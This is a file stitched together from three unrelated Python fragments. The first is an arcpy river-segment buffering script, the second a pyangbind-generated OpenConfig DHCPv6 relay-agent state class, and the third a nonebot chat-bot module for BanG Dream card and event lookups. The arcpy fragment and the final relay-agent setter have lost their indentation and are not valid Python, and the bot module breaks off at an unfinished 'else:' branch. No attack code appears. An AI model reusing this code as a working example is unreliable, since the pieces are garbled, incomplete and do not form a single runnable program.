selected_centerline = myoutput
print("Processing segment {}".format(puppy))
# Get the mean direction for that line segment, output = line_azimuth
foo = ('"ScriptID" = {}'.format(puppy))
direction_select = arcpy.SelectLayerByAttribute_management(linearDirectMean, 'NEW_SELECTION', foo)
cursor = arcpy.da.SearchCursor(direction_select,'CompassA')
for row in cursor:
line_azimuth = row[0]
print("line azimuth = {}".format(line_azimuth))
# Clip the river polygon to the line segment, output = subreach_x
# Buffer selected_centerline with a BIG buffer and non-rounded edges
foo_output = "foobuffer"
foobuffer = arcpy.Buffer_analysis(selected_centerline, foo_output, "35 meters", "FULL", "FLAT")
# Clip inundated_area with the buffer
foo_clip_output = "fooclip"
fooclip = arcpy.Clip_analysis(inundated_area, foo_output, foo_clip_output)
# Convert multi-part to single-part
| |
an
interface
"""
# pyangbind-generated per-instance slots and YANG metadata for the
# /relay-agent/dhcpv6/interfaces/interface/options/state container.
# The double-underscore slot names are name-mangled leaf storage attributes.
__slots__ = ('_path_helper', '_extmethods', '__enable_interface_id','__enable_remote_id','__interface_id','__remote_id','__sent_interface_id','__sent_remote_id',)
_yang_name = 'state'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
    # pyangbind-generated constructor: initialise each YANG leaf with a
    # YANGDynClass wrapper carrying its type, default, and schema metadata.
    # Do not hand-edit; regenerate from the YANG model instead.
    self._path_helper = False
    self._extmethods = False
    self.__enable_interface_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
    self.__enable_remote_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
    self.__interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    self.__remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    self.__sent_interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    self.__sent_remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)

    load = kwargs.pop("load", None)
    # Optional copy-constructor path: a single positional argument that
    # exposes all of this container's elements is copied leaf by leaf.
    if args:
        if len(args) > 1:
            raise TypeError("cannot create a YANG container with >1 argument")
        all_attr = True
        for e in self._pyangbind_elements:
            if not hasattr(args[0], e):
                all_attr = False
                break
        if not all_attr:
            raise ValueError("Supplied object did not have the correct attributes")
        for e in self._pyangbind_elements:
            nobj = getattr(args[0], e)
            # Only copy leaves that differ from their defaults.
            if nobj._changed() is False:
                continue
            setmethod = getattr(self, "_set_%s" % e)
            if load is None:
                setmethod(getattr(args[0], e))
            else:
                setmethod(getattr(args[0], e), load=load)
def _path(self):
    """Return the YANG data path of this container as a list of node names."""
    # Unattached instance: fall back to this container's absolute schema path.
    if not hasattr(self, "_parent"):
        return ['relay-agent', 'dhcpv6', 'interfaces', 'interface', 'options', 'state']
    # Attached: extend the parent's path with this node's own name.
    return self._parent._path() + [self._yang_name]
# --- leaf: enable-interface-id (boolean, operational state) ---------------
# pyangbind-generated getter/setter/unsetter trio backing the name-mangled
# attribute __enable_interface_id; regenerate rather than hand-edit.
def _get_enable_interface_id(self):
    """
    Getter method for enable_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_interface_id (boolean)

    YANG Description: Enables DHCPv6 OPTION_INTERFACE_ID (18) to identify the
    interface on which the client message was received.
    """
    return self.__enable_interface_id

def _set_enable_interface_id(self, v, load=False):
    """
    Setter method for enable_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_interface_id (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_enable_interface_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_enable_interface_id() directly.

    YANG Description: Enables DHCPv6 OPTION_INTERFACE_ID (18) to identify the
    interface on which the client message was received.
    """
    # Values that carry a _utype hook are converted before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """enable_interface_id must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)""",
        })
    self.__enable_interface_id = t
    # Propagate the change notification to the enclosing container, if any.
    if hasattr(self, '_set'):
        self._set()

def _unset_enable_interface_id(self):
    # Reset the leaf to its generated default wrapper.
    self.__enable_interface_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
# --- leaf: enable-remote-id (boolean, operational state) ------------------
# pyangbind-generated getter/setter/unsetter trio backing the name-mangled
# attribute __enable_remote_id; regenerate rather than hand-edit.
def _get_enable_remote_id(self):
    """
    Getter method for enable_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_remote_id (boolean)

    YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
    DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
    Remote-ID suboption as specified in RFC 3046. The remote-id
    field may be used to encode a user name, remote IP address,
    interface/port identifier, etc.
    """
    return self.__enable_remote_id

def _set_enable_remote_id(self, v, load=False):
    """
    Setter method for enable_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/enable_remote_id (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_enable_remote_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_enable_remote_id() directly.

    YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
    DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
    Remote-ID suboption as specified in RFC 3046. The remote-id
    field may be used to encode a user name, remote IP address,
    interface/port identifier, etc.
    """
    # Values that carry a _utype hook are converted before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """enable_remote_id must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)""",
        })
    self.__enable_remote_id = t
    # Propagate the change notification to the enclosing container, if any.
    if hasattr(self, '_set'):
        self._set()

def _unset_enable_remote_id(self):
    # Reset the leaf to its generated default wrapper.
    self.__enable_remote_id = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enable-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='boolean', is_config=False)
# --- leaf: interface-id (string, operational state) -----------------------
# pyangbind-generated getter/setter/unsetter trio backing the name-mangled
# attribute __interface_id; regenerate rather than hand-edit.
def _get_interface_id(self):
    """
    Getter method for interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/interface_id (string)

    YANG Description: Sets DHCPv6 OPTION_INTERFACE_ID (18) to identify the
    interface on which the client message was received.
    """
    return self.__interface_id

def _set_interface_id(self, v, load=False):
    """
    Setter method for interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/interface_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_interface_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_interface_id() directly.

    YANG Description: Sets DHCPv6 OPTION_INTERFACE_ID (18) to identify the
    interface on which the client message was received.
    """
    # Values that carry a _utype hook are converted before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """interface_id must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
        })
    self.__interface_id = t
    # Propagate the change notification to the enclosing container, if any.
    if hasattr(self, '_set'):
        self._set()

def _unset_interface_id(self):
    # Reset the leaf to its generated default wrapper.
    self.__interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
# --- leaf: remote-id (string, operational state) --------------------------
# pyangbind-generated getter/setter/unsetter trio backing the name-mangled
# attribute __remote_id; regenerate rather than hand-edit.
def _get_remote_id(self):
    """
    Getter method for remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/remote_id (string)

    YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
    DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
    Remote-ID suboption as specified in RFC 3046. The remote-id
    field may be used to encode a user name, remote IP address,
    interface/port identifier, etc.
    """
    return self.__remote_id

def _set_remote_id(self, v, load=False):
    """
    Setter method for remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/remote_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_remote_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_remote_id() directly.

    YANG Description: Sets DHCPv6 OPTION_REMOTE_ID (37). This option is the
    DHCPv6 equivalent for the IPv4 (DHCPv4) Relay Agent Option's
    Remote-ID suboption as specified in RFC 3046. The remote-id
    field may be used to encode a user name, remote IP address,
    interface/port identifier, etc.
    """
    # Values that carry a _utype hook are converted before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """remote_id must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
        })
    self.__remote_id = t
    # Propagate the change notification to the enclosing container, if any.
    if hasattr(self, '_set'):
        self._set()

def _unset_remote_id(self):
    # Reset the leaf to its generated default wrapper.
    self.__remote_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
# --- leaf: sent-interface-id (string, operational state) ------------------
# pyangbind-generated getter/setter/unsetter trio backing the name-mangled
# attribute __sent_interface_id; regenerate rather than hand-edit.
def _get_sent_interface_id(self):
    """
    Getter method for sent_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_interface_id (string)

    YANG Description: Reflects the DHCPv6 OPTION_INTERFACE_ID (18) sent to the
    server by the system.
    """
    return self.__sent_interface_id

def _set_sent_interface_id(self, v, load=False):
    """
    Setter method for sent_interface_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_interface_id (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_sent_interface_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_sent_interface_id() directly.

    YANG Description: Reflects the DHCPv6 OPTION_INTERFACE_ID (18) sent to the
    server by the system.
    """
    # Values that carry a _utype hook are converted before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """sent_interface_id must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
        })
    self.__sent_interface_id = t
    # Propagate the change notification to the enclosing container, if any.
    if hasattr(self, '_set'):
        self._set()

def _unset_sent_interface_id(self):
    # Reset the leaf to its generated default wrapper.
    self.__sent_interface_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-interface-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
# pyangbind-generated getter for the name-mangled attribute __sent_remote_id.
# (Its companion setter follows below.)
def _get_sent_remote_id(self):
    """
    Getter method for sent_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_remote_id (string)

    YANG Description: Reflects the DHCPv6 OPTION_REMOTE_ID (37) sent to the
    server by the system.
    """
    return self.__sent_remote_id
def _set_sent_remote_id(self, v, load=False):
"""
Setter method for sent_remote_id, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options/state/sent_remote_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent_remote_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent_remote_id() directly.
YANG Description: Reflects the DHCPv6 OPTION_REMOTE_ID (37) sent to the
server by the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """sent_remote_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="sent-remote-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='string', is_config=False)""",
})
| |
import collections
import datetime
import json
import os
import random
import re
import globals
from crawlers.bestdori import CardTable, EventTable, GachaTable
from nonebot.adapters.cqhttp import Message, MessageSegment
from utils import ImageProcesser
from utils.Asset import ImageAsset
class Card:
    """Query helper for Bandori cards backed by the local bestdori database.

    Translates Chinese/romaji query keywords into database constraints and
    renders per-card detail strings.
    """

    def __init__(self):
        self.card_table = CardTable(os.path.join(globals.datapath, 'bestdori.db'))
        # Query keyword (Chinese name / nickname / romaji) -> DB field value.
        # A value may be a single id or a list of ids.
        # FIX: removed a stray '' literal after 'otae' that relied on
        # accidental implicit string concatenation with the next key.
        self._mapping = {
            'characterId': {
                '户山香澄': 1, '香澄': 1, 'kasumi': 1, 'ksm': 1,
                '花园多惠': 2, '多惠': 2, 'tae': 2, 'otae': 2,
                '牛込里美': 3, '里美': 3, 'rimi': 3,
                '山吹沙绫': 4, '沙绫': 4, 'saya': 4,
                '市谷有咲': 5, '有咲': 5, 'arisa': 5, 'ars': 5,
                '美竹兰': 6, '兰': 6, 'ran': 6,
                '青叶摩卡': 7, '摩卡': 7, 'moca': 7,
                '上原绯玛丽': 8, '绯玛丽': 8, 'hmr': 8, 'himari': 8,
                '宇田川巴': 9, '巴': 9, 'tomoe': 9,
                '羽泽鸫': 10, '鸫': 10, 'tsugumi': 10, 'tgm': 10,
                '弦卷心': 11, '心': 11, 'kkr': 11, 'kokoro': 11,
                '濑田薰': 12, '薰': 12, 'kaoru': 12, 'kor': 12,
                '北泽育美': 13, '育美': 13, 'hagumi': 13, 'hgm': 13,
                '松原花音': 14, '花音': 14, 'kanon': 14,
                '奥泽美咲': 15, '米歇尔': 15, '美咲': 15, 'misaki': 15, 'msk': 15,
                '丸山彩': 16, '彩': 16, 'aya': 16,
                '冰川日菜': 17, '日菜': 17, 'hina': 17,
                '白鹭千圣': 18, '千圣': 18, 'chisato': 18, 'cst': 18,
                '大和麻弥': 19, '麻弥': 19, 'maya': 19,
                '若宫伊芙': 20, '伊芙': 20, 'eve': 20,
                '凑友希那': 21, '友希那': 21, 'yukina': 21, 'ykn': 21,
                '冰川纱夜': 22, '纱夜': 22, 'sayo': 22,
                '今井莉莎': 23, '莉莎': 23, 'lisa': 23,
                '宇田川亚子': 24, '亚子': 24, 'ako': 24,
                '白金燐子': 25, '燐子': 25, 'rinko': 25,
            },
            'bandId': {
                'ppp': 1,
                'ag': 2, 'afterglow': 2,
                'hhw': 3,
                'pp': 4,
                'roselia': 5
            },
            'rarity': {
                '1x': 1, '一星': 1, '1星': 1,
                '2x': 2, '二星': 2, '2星': 2,
                '3x': 3, '三星': 3, '3星': 3,
                '4x': 4, '四星': 4, '4星': 4,
            },
            'attribute': {
                'powerful': 'powerful', '红': 'powerful',
                'cool': 'cool', '蓝': 'cool',
                'happy': 'happy', '橙': 'happy',
                'pure': 'pure', '绿': 'pure',
            },
            'type': {
                '初始': 'initial',
                '无期限': 'permanent',
                '限定': 'limited', '期间限定': 'limited',
                '活动': 'event',
                '联名合作': 'campaign',
                '其他': 'others',
            },
            'skillId': {
                '分': [1, 2, 3, 4, 17, 18, 20, 21, 22, 25, 26], '分卡': [1, 2, 3, 4, 17, 18, 20, 21, 22, 25, 26],
                '奶': [8, 9, 10, 13, 14, 15, 16], '奶卡': [8, 9, 10, 13, 14, 15, 16],
                '判': [5, 6, 7, 11, 12, 15, 16], '判卡': [5, 6, 7, 11, 12, 15, 16],
                '盾': [23, 24], '盾卡': [23, 24],
                '115': 20, '115分': 20,
                '110': [18, 26], '110分': [18, 26],
                '100': 4, '100分': 4,
            }
        }
        # Skill metadata (descriptions, durations) crawled from bestdori.
        with open(os.path.join(globals.datapath, 'json', 'all_skills.json'), 'r', encoding='utf-8') as f:
            self._all_skills = json.load(f)
        # DB card type -> display name.
        self._types = {
            'initial': '初始',
            'permanent': '无期限',
            'limited': '期间限定',
            'event': '活动',
            'campaign': '联名合作',
            'others': '其他',
        }
        # skillId -> short human-readable skill summary.
        self._skill_types = {
            1: '10%分',
            2: '30%分',
            3: '60%分',
            4: '100%分',
            5: 'great判&10%分',
            6: 'good判&20%分',
            7: 'bad判&40%分',
            8: '300奶&10%分',
            9: '450奶&20%分',
            10: '750奶&40%分',
            11: 'great判&30%分',
            12: 'good判&60%分',
            13: '300奶&30%分',
            14: '450奶&60%分',
            15: '300奶&great判',
            16: '450奶&good判',
            17: '65%分|55%分(900)',
            18: '110%分|90%分(900)',
            20: '115%分',
            21: '40%分|450奶(600)',
            22: '80%分|500奶(600)',
            23: '盾|10%分',
            24: '盾|30%分',
            25: '65%分|55%分(great)',
            26: '110%分|90%分(great)',
        }

    def _parse_query_command(self, string):
        """Parse a '查卡' command into an OrderedDict of DB constraints.

        Returns:
            OrderedDict mapping field name -> list of values on success;
            the sentinel string '露佬' for that easter-egg keyword;
            {} when a token is not a recognised filter keyword;
            None when the command is not a card query (wrong keyword,
            or no filter tokens at all).
        """
        string = string.split()
        if string[0] == '查卡' and len(string) > 1:  # avoid query of all cards
            constraint = collections.OrderedDict()
            for c in string[1:]:
                valid_parameter = False
                if c == '露佬':
                    return '露佬'
                for attribute, attribute2id in self._mapping.items():
                    if c.lower() in attribute2id:
                        if constraint.get(attribute) is None:
                            constraint[attribute] = []
                        if isinstance(attribute2id[c.lower()], list):
                            constraint[attribute] += attribute2id[c.lower()]
                        else:
                            constraint[attribute].append(attribute2id[c.lower()])
                        valid_parameter = True
                        break
                if not valid_parameter:
                    return {}
            return constraint

    def _detail(self, cid):
        """Render the detail text for card *cid*.

        Returns:
            (detail_text, resource_set_name, rarity, attribute, band_id);
            ('', '', -1, '', -1) when the card is unknown or lookup fails.
        """
        try:
            name, skill_id, performance, technique, visual, type_, resource_set_name, rarity, attribute, band_id = self.card_table.select_by_single_value(
                'name', 'skillId', 'performance', 'technique', 'visual', 'type',
                'resourceSetName', 'rarity', 'attribute', 'bandId',
                id=cid)[0]
        except Exception:
            # FIX: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; any lookup failure (missing id,
            # schema mismatch, db error) yields the sentinel tuple as before.
            return '', '', -1, '', -1
        else:
            skill_id = str(skill_id)
            # Prefer the most specific localized description that exists.
            skill_description = self._all_skills[skill_id]['simpleDescription'][3] or self._all_skills[skill_id]['simpleDescription'][
                0] or self._all_skills[skill_id]['simpleDescription'][2] or self._all_skills[skill_id]['simpleDescription'][1]
            skill_description = skill_description.replace('\n', '') + f' ({",".join([str(round(n, 1)) for n in self._all_skills[skill_id]["duration"]])})'
            overall = f'{performance}/{technique}/{visual}/{performance + technique + visual}'
            return f'\n标题: {name}\n种类: {self._types[type_]}\n三围: {overall}\n技能: {skill_description}', resource_set_name, rarity, attribute, band_id
class Event:
    """Query helper for Bandori events backed by the local bestdori database.

    Builds rich chat messages (banner, boosts, reward cards, related gacha)
    for a given event and server.
    """

    def __init__(self, card_table):
        self.event_table = EventTable(os.path.join(globals.datapath, 'bestdori.db'))
        # Shared with the other helpers so reward cards resolve to card rows.
        self.card_table = card_table
        # Query keyword -> database field value aliases.
        self._mapping = {
            'attribute': {
                'powerful': 'powerful', '红': 'powerful',
                'cool': 'cool', '蓝': 'cool',
                'happy': 'happy', '橙': 'happy',
                'pure': 'pure', '绿': 'pure',
            },
            'eventType': {
                '一般活动': 'story',
                '竞演LIVE': 'versus', '对邦': 'versus',
                '挑战LIVE': 'challenge', 'cp': 'challenge',
                'LIVE试炼': 'live_try',
                '任务LIVE': 'mission_live',
            },
        }
        # Event / gacha type -> display name.
        self._type = {
            'story': '一般活动',
            'versus': '竞演LIVE',
            'challenge': '挑战LIVE',
            'live_try': 'LIVE试炼',
            'mission_live': '任务LIVE',
        }
        self._gacha_type = {
            'permanent': '无期限',
            'limited': '期间限定',
            'special': '特殊',
        }
        # Server display name -> index, and index -> asset-folder short name.
        self._server = {
            '日服': 0,
            '国际服': 1,
            '台服': 2,
            '国服': 3,
            '韩服': 4,
        }
        self._server_name = {
            0: 'jp',
            1: 'en',
            2: 'tw',
            3: 'cn',
            4: 'kr',
        }
        # event id -> related gacha ids, precomputed by the crawler.
        with open(os.path.join(globals.datapath, 'json', 'event_gacha.json'), 'r', encoding='utf-8') as f:
            self._event_gacha = json.load(f)['event2gacha']

    def _parse_query_command(self, string):
        """Parse an '活动列表' command into an OrderedDict of DB constraints.

        Returns:
            OrderedDict field -> list of values on success; None when a
            token is not recognised or the keyword is absent.
        """
        string = string.split()
        if string[0] == '活动列表':
            constraint = collections.OrderedDict()
            for c in string[1:]:
                valid_parameter = False
                for attribute, attribute2id in self._mapping.items():
                    if c.lower() in attribute2id:
                        if constraint.get(attribute) is None:
                            constraint[attribute] = []
                        if isinstance(attribute2id[c.lower()], list):
                            constraint[attribute] += attribute2id[c.lower()]
                        else:
                            constraint[attribute].append(attribute2id[c.lower()])
                        valid_parameter = True
                        break
                if not valid_parameter:
                    return None
            return constraint

    def _detail_ver2(self, eid, server):
        """Build a Message describing event *eid* on *server*.

        Returns the Message, or None when the event has no banner asset
        (implicitly, as before).
        """
        res = self.event_table.select_by_single_value('bannerAssetBundleName', id=eid)
        if res:
            banner_asset_bundle_name, = res[0]
            if banner_asset_bundle_name:
                detail = Message()
                with open(os.path.join(globals.datapath, 'json', 'events', f'{eid}.json'), 'r', encoding='utf-8') as f:
                    event_data = json.load(f)
                if event_data["startAt"][server]:
                    # Banner image (when the asset has been downloaded).
                    file_path = os.path.join(globals.asset_event_path, self._server_name[server], f'{banner_asset_bundle_name}.png')
                    if os.access(file_path, os.R_OK):
                        detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
                    # Header: title, type, start/end in Beijing time (UTC+8).
                    detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
                        '标题': event_data['eventName'][server],
                        '种类': self._type[event_data['eventType']],
                        '开始时间': f'{(datetime.datetime.utcfromtimestamp(int(event_data["startAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
                        '结束时间': f'{(datetime.datetime.utcfromtimestamp(int(event_data["endAt"][server]) // 1000) + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")}(北京时间)',
                    }.items()])))
                    detail.append(MessageSegment.text('\n属性: '))
                    # Attribute bonuses: icon + percentage for each boosted
                    # attribute. (FIX: was a side-effect list comprehension;
                    # rewritten as a plain loop, same appends in same order.)
                    for a in event_data['attributes']:
                        detail.append(MessageSegment.image(ImageAsset.image_path(os.path.join(globals.asset_resource_path, f'{a["attribute"]}.png'))))
                        detail.append(MessageSegment.text(f'+{a["percent"]}%'))
                    detail.append(MessageSegment.text('\n角色: '))
                    # Boosted characters as a thumbnail strip with +% labels.
                    images = [[
                        ImageProcesser.open_nontransparent(os.path.join(globals.asset_resource_path, f'chara_icon_{c["characterId"]}.png')) or
                        ImageProcesser.white_padding(420, 140),
                    ] for c in event_data['characters']]
                    texts = [f'+{c["percent"]}%' for c in event_data['characters']]
                    character_raw = ImageProcesser.thumbnail(
                        images=images,
                        labels=texts,
                        col_num=len(images),
                        row_space=5,
                    )
                    detail.append(MessageSegment.image(character_raw))
                    detail.append(MessageSegment.text('\n奖励: '))
                    # Reward cards as a thumbnail strip labelled by card id.
                    cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=event_data['rewardCards'])
                    rewards_raw = ImageProcesser.thumbnail(
                        images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) or
                                ImageProcesser.white_padding(420, 140)
                                for c in cards],
                        labels=[str(c[0]) for c in cards],
                        col_num=len(cards),
                        row_space=5,
                    )
                    detail.append(MessageSegment.image(rewards_raw))
                    # Related gacha pools with their pickup cards, if any.
                    if self._event_gacha[server].get(str(eid)):
                        detail.append(MessageSegment.text('\n关联卡池: '))
                        for gacha_id in self._event_gacha[server][str(eid)]:
                            with open(os.path.join(globals.datapath, 'json', 'gachas', f'{gacha_id}.json'), 'r', encoding='utf-8') as f:
                                gacha_data = json.load(f)
                            new_cards = [card for card in gacha_data['newCards'] if gacha_data['details'][server][str(card)]['pickup']]
                            if new_cards:
                                file_path = os.path.join(globals.asset_gacha_path, self._server_name[server], f'{gacha_data["bannerAssetBundleName"]}.png')
                                if os.access(file_path, os.R_OK):
                                    detail.append(MessageSegment.image(ImageAsset.image_path(file_path)))
                                detail.append(MessageSegment.text('\n'.join([f'{key}: {value}' for key, value in {
                                    '标题': gacha_data['gachaName'][server],
                                    '种类': self._gacha_type[gacha_data['type']],
                                    'ID': str(gacha_id),
                                }.items()])))
                                detail.append(MessageSegment.text('\nPICK UP: '))
                                cards = self.card_table.select('id', 'resourceSetName', 'rarity', 'attribute', 'bandId', id=new_cards)
                                pickups_raw = ImageProcesser.thumbnail(
                                    images=[ImageProcesser.merge_image(c[1], c[2], c[3], c[4], thumbnail=True, trained=False) or
                                            ImageProcesser.white_padding(420, 140)
                                            for c in cards],
                                    labels=[str(c[0]) for c in cards],
                                    col_num=len(cards),
                                    row_space=5,
                                )
                                detail.append(MessageSegment.image(pickups_raw))
                else:
